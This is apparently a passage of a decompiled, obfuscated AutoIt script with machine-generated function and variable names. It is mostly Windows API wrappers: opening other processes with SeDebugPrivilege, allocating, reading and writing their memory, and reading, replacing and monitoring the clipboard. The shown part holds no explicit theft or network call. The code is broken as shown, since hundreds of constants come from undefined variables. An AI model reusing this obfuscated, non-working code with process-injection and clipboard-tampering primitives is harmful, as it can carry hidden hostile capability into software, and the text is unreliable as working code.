- IF STRINGREGEXP($Var016A ,"[a-zA-ZÀ-ÿšœžŸ]")THEN
- $Var016A =STRINGUPPER($Var016A )
- $Local0068 = 0
- ENDIF
- CASE NOT STRINGREGEXP($Var016A ,"[a-zA-ZÀ-ÿšœžŸ]")
- $Local0068 = 1
- CASE ELSE
- $Var016A =STRINGLOWER($Var016A )
- ENDSELECT
- $Local0069 &=$Var016A
- NEXT
- RETURN $Local0069
- ENDFUNC
- Func Fn00D9($Arg00,$Arg01)
- LOCAL $Var016B
- SELECT
- CASE NOT STRINGISINT($Arg01)
- SETERROR( 1 )
- RETURN ""
- CASE STRINGLEN($Arg00)< 1
- SETERROR( 1 )
- RETURN ""
- CASE $Arg01<= 0
- SETERROR( 1 )
- RETURN ""
- CASE ELSE
- FOR $Local001D = 1 TO $Arg01
- $Var016B &=$Arg00
- NEXT
- RETURN $Var016B
- ENDSELECT
- ENDFUNC
- Func Fn00DA($Arg00)
- LOCAL $Local006A =STRINGLEN($Arg00)
- IF $Local006A < 1 THEN RETURN SETERROR( 1 , 0 ,"")
- LOCAL $Local006B =DLLSTRUCTCREATE("char[" &$Local006A + 1 &"]" )
- DLLSTRUCTSETDATA($Local006B , 1 ,$Arg00)
- LOCAL $Local006C =DLLCALL("msvcrt.dll","ptr:cdecl" ,"_strrev" ,"struct*" ,$Local006B )
- IF @ERROR OR $Local006C [ 0 ]= 0 THEN RETURN SETERROR( 2 , 0 ,"")
- RETURN DLLSTRUCTGETDATA($Local006B , 1 )
- ENDFUNC
- Func Fn00DB($Arg00)
- RETURN HEX(STRINGTOBINARY($Arg00))
- ENDFUNC
- GLOBAL CONST $Var016C =NUMBER($Var016D )
- GLOBAL CONST $Var016E =NUMBER($Var016F )
- GLOBAL CONST $Var0170 =NUMBER($Var0171 )
- GLOBAL CONST $Var0172 =NUMBER($Var0173 )
- GLOBAL CONST $Var0174 =NUMBER($Var0175 )
- GLOBAL CONST $Var0176 =NUMBER($Var0177 )
- GLOBAL CONST $Var0178 =NUMBER($Var0179 )
- GLOBAL CONST $Var017A =NUMBER($Var017B )
- GLOBAL CONST $Var017C =NUMBER($Var017D )
- GLOBAL CONST $Var017E =NUMBER($Var017F )
- GLOBAL CONST $Var0180 =NUMBER($Var0181 )
- GLOBAL CONST $Var0182 =NUMBER($Var0183 )
- GLOBAL CONST $Var0184 =NUMBER($Var0185 )
- GLOBAL CONST $Var0186 =NUMBER($Var0187 )
- GLOBAL CONST $Var0188 =$Var016C +$Var0174
- GLOBAL CONST $Var0189 =$Var016E +$Var0174
- GLOBAL CONST $Var018A =NUMBER($Var018B )
- GLOBAL CONST $Var018C =NUMBER($Var018D )
- GLOBAL CONST $Var018E =NUMBER($Var018F )
- GLOBAL CONST $Var0190 =NUMBER($Var0191 )
- GLOBAL CONST $Var0192 =NUMBER($Var0193 )
- GLOBAL CONST $Var0194 =NUMBER($Var0195 )
- GLOBAL CONST $Var0196 =NUMBER($Var0197 )
- GLOBAL CONST $Var0198 =NUMBER($Var0199 )
- GLOBAL CONST $Var019A =NUMBER($Var019B )
- GLOBAL CONST $Var019C =NUMBER($Var019D )
- GLOBAL CONST $Var019E =NUMBER($Var019F )
- GLOBAL CONST $Var01A0 =NUMBER($Var01A1 )
- GLOBAL CONST $Var01A2 =NUMBER($Var01A3 )
- GLOBAL CONST $Var01A4 =NUMBER($Var01A5 )
- GLOBAL CONST $Var01A6 =NUMBER($Var01A7 )
- GLOBAL CONST $Var01A8 =NUMBER($Var01A9 )
- GLOBAL CONST $Var01AA =NUMBER($Var01AB )
- GLOBAL CONST $Var01AC =NUMBER($Var01AD )
- GLOBAL CONST $Var01AE =NUMBER($Var01AF )
- GLOBAL CONST $Var01B0 =NUMBER($Var01B1 )
- GLOBAL CONST $Var01B2 =NUMBER($Var01B3 )
- GLOBAL CONST $Var01B4 =NUMBER($Var01B5 )
- GLOBAL CONST $Var01B6 =NUMBER($Var01B7 )
- GLOBAL CONST $Var01B8 =NUMBER($Var01B9 )
- GLOBAL CONST $Var01BA =NUMBER($Var01BB )
- GLOBAL CONST $Var01BC =NUMBER($Var01BD )
- GLOBAL CONST $Var01BE =NUMBER($Var01BF )
- GLOBAL CONST $Var01C0 =$Var01C1
- Func Fn00DC(BYREF $ArgRef00)
- LOCAL $Local006D =DLLSTRUCTGETDATA($ArgRef00,"Mem" )
- LOCAL $Local006E =DLLSTRUCTGETDATA($ArgRef00,"hProc" )
- LOCAL $Local006F =Fn00E9($Local006E ,$Local006D , 0 ,$Var01A4 )
- DLLCALL("kernel32.dll","bool" ,"CloseHandle","handle" ,$Local006E )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local006F
- ENDFUNC
- Func Fn00DD($Arg00,$ArgOpt01=0)
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GlobalAlloc","uint" ,$ArgOpt01,"ulong_ptr" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00DE($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalFree","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00DF($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalLock","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E0($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","ulong_ptr" ,"GlobalSize","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E1($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GlobalUnlock","handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E2($Arg00,$Arg01,BYREF $ArgRef02)
- LOCAL $Local000E =DLLCALL("User32.dll","dword" ,"GetWindowThreadProcessId","hwnd" ,$Arg00,"dword*" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local0070 =$Local000E [ 2 ]
- IF $Local0070 = 0 THEN RETURN SETERROR( 1 , 0 , 0 )
- LOCAL $Local0071 =BITOR($Var01AC ,$Var01AE ,$Var01B0 )
- LOCAL $Local006E =Fn00EA($Local0071 ,FALSE ,$Local0070 ,TRUE )
- LOCAL $Local0072 =BITOR($Var018C ,$Var018A )
- LOCAL $Local006D =Fn00E7($Local006E , 0 ,$Arg01,$Local0072 ,$Var0196 )
- IF $Local006D = 0 THEN RETURN SETERROR( 2 , 0 , 0 )
- $ArgRef02=DLLSTRUCTCREATE($Var01C0 )
- DLLSTRUCTSETDATA($ArgRef02,"hProc" ,$Local006E )
- DLLSTRUCTSETDATA($ArgRef02,"Size" ,$Arg01)
- DLLSTRUCTSETDATA($ArgRef02,"Mem" ,$Local006D )
- RETURN $Local006D
- ENDFUNC
- Func Fn00E3($Arg00,$Arg01,$Arg02)
- DLLCALL("kernel32.dll","none" ,"RtlMoveMemory","struct*" ,$Arg01,"struct*" ,$Arg00,"ulong_ptr" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
- ENDFUNC
- Func Fn00E4(BYREF $ArgRef00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"ReadProcessMemory","handle" ,DLLSTRUCTGETDATA($ArgRef00,"hProc" ),"ptr" ,$Arg01,"struct*" ,$Arg02,"ulong_ptr" ,$Arg03,"ulong_ptr*", 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E5(BYREF $ArgRef00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04="struct*")
- IF $ArgOpt02= 0 THEN $ArgOpt02=DLLSTRUCTGETDATA($ArgRef00,"Mem" )
- IF $ArgOpt03= 0 THEN $ArgOpt03=DLLSTRUCTGETDATA($ArgRef00,"Size" )
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteProcessMemory","handle" ,DLLSTRUCTGETDATA($ArgRef00,"hProc" ),"ptr" ,$ArgOpt02,$ArgOpt04,$Arg01,"ulong_ptr" ,$ArgOpt03,"ulong_ptr*", 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E6($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"VirtualAlloc","ptr" ,$Arg00,"ulong_ptr" ,$Arg01,"dword" ,$Arg02,"dword" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E7($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
- LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"VirtualAllocEx","handle" ,$Arg00,"ptr" ,$Arg01,"ulong_ptr" ,$Arg02,"dword" ,$Arg03,"dword" ,$Arg04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E8($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"VirtualFree","ptr" ,$Arg00,"ulong_ptr" ,$Arg01,"dword" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00E9($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"VirtualFreeEx","handle" ,$Arg00,"ptr" ,$Arg01,"ulong_ptr" ,$Arg02,"dword" ,$Arg03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00EA($Arg00,$Arg01,$Arg02,$ArgOpt03=FALSE )
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $Local000E [ 0 ]THEN RETURN $Local000E [ 0 ]
- IF NOT $ArgOpt03 THEN RETURN 0
- LOCAL $Local0001 =Fn0000(BITOR($Var0152 ,$Var0153 ))
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- Fn0001($Local0001 ,"SeDebugPrivilege",TRUE )
- LOCAL $Local0053 =@ERROR
- LOCAL $Local0054 =@EXTENDED
- LOCAL $Local0055 = 0
- IF NOT @ERROR THEN
- $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
- $Local0053 =@ERROR
- $Local0054 =@EXTENDED
- IF $Local000E [ 0 ]THEN $Local0055 =$Local000E [ 0 ]
- Fn0001($Local0001 ,"SeDebugPrivilege",FALSE )
- IF @ERROR THEN
- $Local0053 =@ERROR
- $Local0054 =@EXTENDED
- ENDIF
- ENDIF
- DLLCALL("kernel32.dll","bool" ,"CloseHandle","handle" ,$Local0001 )
- RETURN SETERROR($Local0053 ,$Local0054 ,$Local0055 )
- ENDFUNC
- GLOBAL CONST $Var01C2 =NUMBER($Var01C3 )
- GLOBAL CONST $Var01C4 =NUMBER($Var01C5 )
- GLOBAL CONST $Var01C6 =NUMBER($Var01C7 )
- GLOBAL CONST $Var01C8 =NUMBER($Var01C9 )
- GLOBAL CONST $Var01CA =NUMBER($Var01CB )
- GLOBAL CONST $Var01CC =NUMBER($Var01CD )
- GLOBAL CONST $Var01CE =NUMBER($Var01CF )
- GLOBAL CONST $Var01D0 =NUMBER($Var01D1 )
- GLOBAL CONST $Var01D2 =NUMBER($Var01D3 )
- GLOBAL CONST $Var01D4 =NUMBER($Var01D5 )
- GLOBAL CONST $Var01D6 =NUMBER($Var01D7 )
- GLOBAL CONST $Var01D8 =NUMBER($Var01D9 )
- GLOBAL CONST $Var01DA =NUMBER($Var01DB )
- GLOBAL CONST $Var01DC =NUMBER($Var01DD )
- GLOBAL CONST $Var01DE =NUMBER($Var01DF )
- GLOBAL CONST $Var01E0 =NUMBER($Var01E1 )
- GLOBAL CONST $Var01E2 =NUMBER($Var01E3 )
- GLOBAL CONST $Var01E4 =NUMBER($Var01E5 )
- GLOBAL CONST $Var01E6 =NUMBER($Var01E7 )
- GLOBAL CONST $Var01E8 =NUMBER($Var01E9 )
- GLOBAL CONST $Var01EA =NUMBER($Var01EB )
- GLOBAL CONST $Var01EC =NUMBER($Var01ED )
- GLOBAL CONST $Var01EE =NUMBER($Var01EF )
- GLOBAL CONST $Var01F0 =NUMBER($Var01F1 )
- GLOBAL CONST $Var01F2 =NUMBER($Var01F3 )
- GLOBAL CONST $Var01F4 =NUMBER($Var01F5 )
- Func Fn00EB($Arg00,$Arg01)
- DLLCALL("user32.dll","bool" ,"ChangeClipboardChain","hwnd" ,$Arg00,"hwnd" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
- ENDFUNC
- Func Fn00EC()
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"CloseClipboard")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00ED()
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"CountClipboardFormats")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00EE()
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"EmptyClipboard")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00EF($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","uint" ,"EnumClipboardFormats","uint" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00F0($Arg00)
- LOCAL $Local0073 [0x0012 ]=[0x0011 ,"Text" ,"Bitmap" ,"Metafile Picture","SYLK" ,"DIF" ,"TIFF" ,"OEM Text" ,"DIB" ,"Palette" ,"Pen Data" ,"RIFF" ,"WAVE" ,"Unicode Text","Enhanced Metafile","HDROP" ,"Locale" ,"DIB V5" ]
- IF $Arg00>= 1 AND $Arg00<=0x0011 THEN RETURN $Local0073 [$Arg00]
- SWITCH $Arg00
- CASE $Var01E4
- RETURN "Owner Display"
- CASE $Var01E6
- RETURN "Private Text"
- CASE $Var01E8
- RETURN "Private Bitmap"
- CASE $Var01EA
- RETURN "Private Metafile Picture"
- CASE $Var01EC
- RETURN "Private Enhanced Metafile"
- CASE ELSE
- RETURN Fn00F3($Arg00)
- ENDSWITCH
- ENDFUNC
- Func Fn00F1($ArgOpt00=1)
- IF NOT Fn00F9($ArgOpt00)THEN RETURN SETERROR(- 1 , 0 , 0 )
- IF NOT Fn00FA( 0 )THEN RETURN SETERROR(- 2 , 0 , 0 )
- LOCAL $Local0074 =Fn00F2($ArgOpt00)
- IF $Local0074 = 0 THEN
- Fn00EC()
- RETURN SETERROR(- 3 , 0 , 0 )
- ENDIF
- LOCAL $Local0075 =Fn00DF($Local0074 )
- IF $Local0075 = 0 THEN
- Fn00EC()
- RETURN SETERROR(- 4 , 0 , 0 )
- ENDIF
- LOCAL $Local0076 =Fn00E0($Local0074 )
- IF $Local0076 = 0 THEN
- Fn00E1($Local0074 )
- Fn00EC()
- RETURN SETERROR(- 5 , 0 ,"")
- ENDIF
- LOCAL $Local0078
- SWITCH $ArgOpt00
- CASE $Var01C2 ,$Var01CE
- $Local0078 =DLLSTRUCTCREATE("char[" &$Local0076 &"]" ,$Local0075 )
- CASE $Var01DA
- $Local0076 =ROUND($Local0076 / 2 )
- $Local0078 =DLLSTRUCTCREATE("wchar[" &$Local0076 &"]" ,$Local0075 )
- CASE ELSE
- $Local0078 =DLLSTRUCTCREATE("byte[" &$Local0076 &"]" ,$Local0075 )
- ENDSWITCH
- LOCAL $Local0077 =DLLSTRUCTGETDATA($Local0078 , 1 )
- Fn00E1($Local0074 )
- Fn00EC()
- RETURN SETEXTENDED($Local0076 ,$Local0077 )
- ENDFUNC
- Func Fn00F2($ArgOpt00=1)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetClipboardData","uint" ,$ArgOpt00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00F3($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetClipboardFormatNameW","uint" ,$Arg00,"wstr" ,"","int" ,0x1000 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- RETURN $Local000E [ 2 ]
- ENDFUNC
- Func Fn00F4()
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetOpenClipboardWindow")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00F5()
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetClipboardOwner")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00F6($Arg00)
- IF NOT ISARRAY($Arg00)THEN RETURN SETERROR(- 1 , 0 , 0 )
- IF $Arg00[ 0 ]<= 0 THEN RETURN SETERROR(- 2 , 0 , 0 )
- LOCAL $Local0078 =DLLSTRUCTCREATE("uint[" &$Arg00[ 0 ]&"]" )
- FOR $Var014F = 1 TO $Arg00[ 0 ]
- DLLSTRUCTSETDATA($Local0078 , 1 ,$Arg00[$Var014F ],$Var014F )
- NEXT
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetPriorityClipboardFormat","struct*" ,$Local0078 ,"int" ,$Arg00[ 0 ])
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00F7()
- LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetClipboardSequenceNumber")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00F8()
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetClipboardViewer")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00F9($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"IsClipboardFormatAvailable","uint" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00FA($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"OpenClipboard","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00FB($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","uint" ,"RegisterClipboardFormatW","wstr" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00FC($Arg00,$ArgOpt01=1)
- LOCAL $Local0078 ,$Local0089 ,$Local0074 ,$Local003F
- IF ISNUMBER($Arg00)AND $Arg00= 0 THEN
- $Local0074 =$Arg00
- ELSE
- IF ISBINARY($Arg00)THEN
- $Local003F =BINARYLEN($Arg00)
- ELSEIF ISSTRING($Arg00)THEN
- $Local003F =STRINGLEN($Arg00)
- ELSE
- RETURN SETERROR( 2 , 0 , 0 )
- ENDIF
- $Local003F += 1
- IF $ArgOpt01=$Var01DA THEN
- $Local0074 =Fn00DD($Local003F * 2 ,$Var0189 )
- ELSE
- $Local0074 =Fn00DD($Local003F ,$Var0189 )
- ENDIF
- IF $Local0074 = 0 THEN RETURN SETERROR(- 1 , 0 , 0 )
- $Local0089 =Fn00DF($Local0074 )
- IF $Local0089 = 0 THEN RETURN SETERROR(- 2 , 0 , 0 )
- SWITCH $ArgOpt01
- CASE $Var01C2 ,$Var01CE
- $Local0078 =DLLSTRUCTCREATE("char[" &$Local003F &"]" ,$Local0089 )
- CASE $Var01DA
- $Local0078 =DLLSTRUCTCREATE("wchar[" &$Local003F &"]" ,$Local0089 )
- CASE ELSE
- $Local0078 =DLLSTRUCTCREATE("byte[" &$Local003F &"]" ,$Local0089 )
- ENDSWITCH
- DLLSTRUCTSETDATA($Local0078 , 1 ,$Arg00)
- Fn00E1($Local0074 )
- ENDIF
- IF NOT Fn00FA( 0 )THEN RETURN SETERROR(- 5 , 0 , 0 )
- IF NOT Fn00EE()THEN RETURN SETERROR(- 6 , 0 , 0 )
- IF NOT Fn00FD($Local0074 ,$ArgOpt01)THEN
- Fn00EC()
- RETURN SETERROR(- 7 , 0 , 0 )
- ENDIF
- Fn00EC()
- RETURN $Local0074
- ENDFUNC
- Func Fn00FD(BYREF $ArgRef00,$ArgOpt01=1)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"SetClipboardData","uint" ,$ArgOpt01,"handle" ,$ArgRef00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn00FE($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetClipboardViewer","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- GLOBAL CONST $Var01F6 =NUMBER($Var01F7 )
- GLOBAL CONST $Var01F8 =$Var01F6 +NUMBER($Var01F9 )
- GLOBAL CONST $Var01FA =$Var01F6 +NUMBER($Var01FB )
- GLOBAL CONST $Var01FC =$Var01F6 +NUMBER($Var01FD )
- GLOBAL CONST $Var01FE =$Var01F6 +NUMBER($Var01FF )
- GLOBAL CONST $Var0200 =$Var01F6 +NUMBER($Var0201 )
- GLOBAL CONST $Var0202 =$Var01F6 +NUMBER($Var0203 )
- GLOBAL CONST $Var0204 =$Var01F6 +NUMBER($Var0205 )
- GLOBAL CONST $Var0206 =$Var01F6 +NUMBER($Var0207 )
- GLOBAL CONST $Var0208 =$Var01F6 +NUMBER($Var0209 )
- GLOBAL CONST $Var020A =$Var01F6 +NUMBER($Var020B )
- GLOBAL CONST $Var020C =$Var01F6 +NUMBER($Var020D )
- GLOBAL CONST $Var020E =$Var01F6 +NUMBER($Var020F )
- GLOBAL CONST $Var0210 =$Var01F6 +NUMBER($Var0211 )
- GLOBAL CONST $Var0212 =$Var01F6 +NUMBER($Var0213 )
- GLOBAL CONST $Var0214 =$Var01F6 +NUMBER($Var0215 )
- GLOBAL CONST $Var0216 =$Var01F6 +NUMBER($Var0217 )
- GLOBAL CONST $Var0218 =$Var01F6 +NUMBER($Var0219 )
- GLOBAL CONST $Var021A =$Var01F6 +NUMBER($Var021B )
- GLOBAL CONST $Var021C =$Var01F6 +NUMBER($Var021D )
- GLOBAL CONST $Var021E =$Var01F6 +NUMBER($Var021F )
- GLOBAL CONST $Var0220 =$Var01F6 +NUMBER($Var0221 )
- GLOBAL CONST $Var0222 =$Var01F6 +NUMBER($Var0223 )
- GLOBAL CONST $Var0224 =$Var01F6 +NUMBER($Var0225 )
- GLOBAL CONST $Var0226 =$Var01F6 +NUMBER($Var0227 )
- GLOBAL CONST $Var0228 =$Var01F6 +NUMBER($Var0229 )
- GLOBAL CONST $Var022A =$Var01F6 +NUMBER($Var022B )
- GLOBAL CONST $Var022C =$Var01F6 +NUMBER($Var022D )
- GLOBAL CONST $Var022E =$Var01F6 +NUMBER($Var022F )
- GLOBAL CONST $Var0230 =$Var01F6 +NUMBER($Var0231 )
- GLOBAL CONST $Var0232 =$Var01F6 +NUMBER($Var0233 )
- GLOBAL CONST $Var0234 =$Var01F6 +NUMBER($Var0235 )
- GLOBAL CONST $Var0236 =$Var01F6 +NUMBER($Var0237 )
- GLOBAL CONST $Var0238 =$Var01F6 +NUMBER($Var0239 )
- GLOBAL CONST $Var023A =$Var01F6 +NUMBER($Var023B )
- GLOBAL CONST $Var023C =$Var01F6 +NUMBER($Var023D )
- GLOBAL CONST $Var023E =$Var01F6 +NUMBER($Var023F )
- GLOBAL CONST $Var0240 =$Var01F6 +NUMBER($Var0241 )
- GLOBAL CONST $Var0242 =$Var01F6 +NUMBER($Var0243 )
- GLOBAL CONST $Var0244 =$Var01F6 +NUMBER($Var0245 )
- GLOBAL CONST $Var0246 =$Var01F6 +NUMBER($Var0247 )
- GLOBAL CONST $Var0248 =$Var01F6 +NUMBER($Var0249 )
- GLOBAL CONST $Var024A =$Var01F6 +NUMBER($Var024B )
- GLOBAL CONST $Var024C =$Var01F6 +NUMBER($Var024D )
- GLOBAL CONST $Var024E =$Var01F6 +NUMBER($Var024F )
- GLOBAL CONST $Var0250 =$Var01F6 +NUMBER($Var0251 )
- GLOBAL CONST $Var0252 =$Var01F6 +NUMBER($Var0253 )
- GLOBAL CONST $Var0254 =$Var01F6 +NUMBER($Var0255 )
- GLOBAL CONST $Var0256 =$Var01F6 +NUMBER($Var0257 )
- GLOBAL CONST $Var0258 =$Var01F6 +NUMBER($Var0259 )
- GLOBAL CONST $Var025A =$Var01F6 +NUMBER($Var025B )
- GLOBAL CONST $Var025C =$Var01F6 +NUMBER($Var025D )
- GLOBAL CONST $Var025E =$Var01F6 +NUMBER($Var025F )
- GLOBAL CONST $Var0260 =$Var01F6 +NUMBER($Var0261 )
- GLOBAL CONST $Var0262 =$Var01F6 +NUMBER($Var0263 )
- GLOBAL CONST $Var0264 =$Var01F6 +NUMBER($Var0265 )
- GLOBAL CONST $Var0266 =$Var01F6 +NUMBER($Var0267 )
- GLOBAL CONST $Var0268 =$Var01F6 +NUMBER($Var0269 )
- GLOBAL CONST $Var026A =$Var01F6 +NUMBER($Var026B )
- GLOBAL CONST $Var026C =$Var01F6 +NUMBER($Var026D )
- GLOBAL CONST $Var026E =$Var01F6 +NUMBER($Var026F )
- GLOBAL CONST $Var0270 =$Var01F6 +NUMBER($Var0271 )
- GLOBAL CONST $Var0272 =$Var01F6 +NUMBER($Var0273 )
- GLOBAL CONST $Var0274 =$Var01F6 +NUMBER($Var0275 )
- GLOBAL CONST $Var0276 =$Var01F6 +NUMBER($Var0277 )
- GLOBAL CONST $Var0278 =$Var01F6 +NUMBER($Var0279 )
- GLOBAL CONST $Var027A =$Var01F6 +NUMBER($Var027B )
- GLOBAL CONST $Var027C =$Var01F6 +NUMBER($Var027D )
- GLOBAL CONST $Var027E =$Var01F6 +NUMBER($Var027F )
- GLOBAL CONST $Var0280 =$Var01F6 +NUMBER($Var0281 )
- GLOBAL CONST $Var0282 =$Var01F6 +NUMBER($Var0283 )
- GLOBAL CONST $Var0284 =$Var01F6 +NUMBER($Var0285 )
- GLOBAL CONST $Var0286 =$Var01F6 +NUMBER($Var0287 )
- GLOBAL CONST $Var0288 =$Var01F6 +NUMBER($Var0289 )
- GLOBAL CONST $Var028A =NUMBER($Var028B )
- GLOBAL CONST $Var028C =NUMBER($Var028D )
- GLOBAL CONST $Var028E =NUMBER($Var028F )
- GLOBAL CONST $Var0290 =NUMBER($Var0291 )
- GLOBAL CONST $Var0292 =NUMBER($Var0293 )
- GLOBAL CONST $Var0294 =NUMBER($Var0295 )
- GLOBAL CONST $Var0296 =NUMBER($Var0297 )
- GLOBAL CONST $Var0298 =NUMBER($Var0299 )
- GLOBAL CONST $Var029A =NUMBER($Var029B )
- GLOBAL CONST $Var029C =NUMBER($Var029D )
- GLOBAL CONST $Var029E =NUMBER($Var029F )
- GLOBAL CONST $Var02A0 =NUMBER($Var02A1 )
- GLOBAL CONST $Var02A2 =NUMBER($Var02A3 )
- GLOBAL CONST $Var02A4 =NUMBER($Var02A5 )
- GLOBAL CONST $Var02A6 =NUMBER($Var02A7 )
- GLOBAL CONST $Var02A8 =NUMBER($Var02A9 )
- GLOBAL CONST $Var02AA =NUMBER($Var02AB )
- GLOBAL CONST $Var02AC =NUMBER($Var02AD )
- GLOBAL CONST $Var02AE =NUMBER($Var02AF )
- GLOBAL CONST $Var02B0 =NUMBER($Var02B1 )
- GLOBAL CONST $Var02B2 =NUMBER($Var02B3 )
- GLOBAL CONST $Var02B4 =NUMBER($Var02B5 )
- GLOBAL CONST $Var02B6 =NUMBER($Var02B7 )
- GLOBAL CONST $Var02B8 =NUMBER($Var02B9 )
- GLOBAL CONST $Var02BA =NUMBER($Var02BB )
- GLOBAL CONST $Var02BC =NUMBER($Var02BD )
- GLOBAL CONST $Var02BE =NUMBER($Var02BF )
- GLOBAL CONST $Var02C0 =NUMBER($Var02C1 )
- GLOBAL CONST $Var02C2 =NUMBER($Var02C3 )
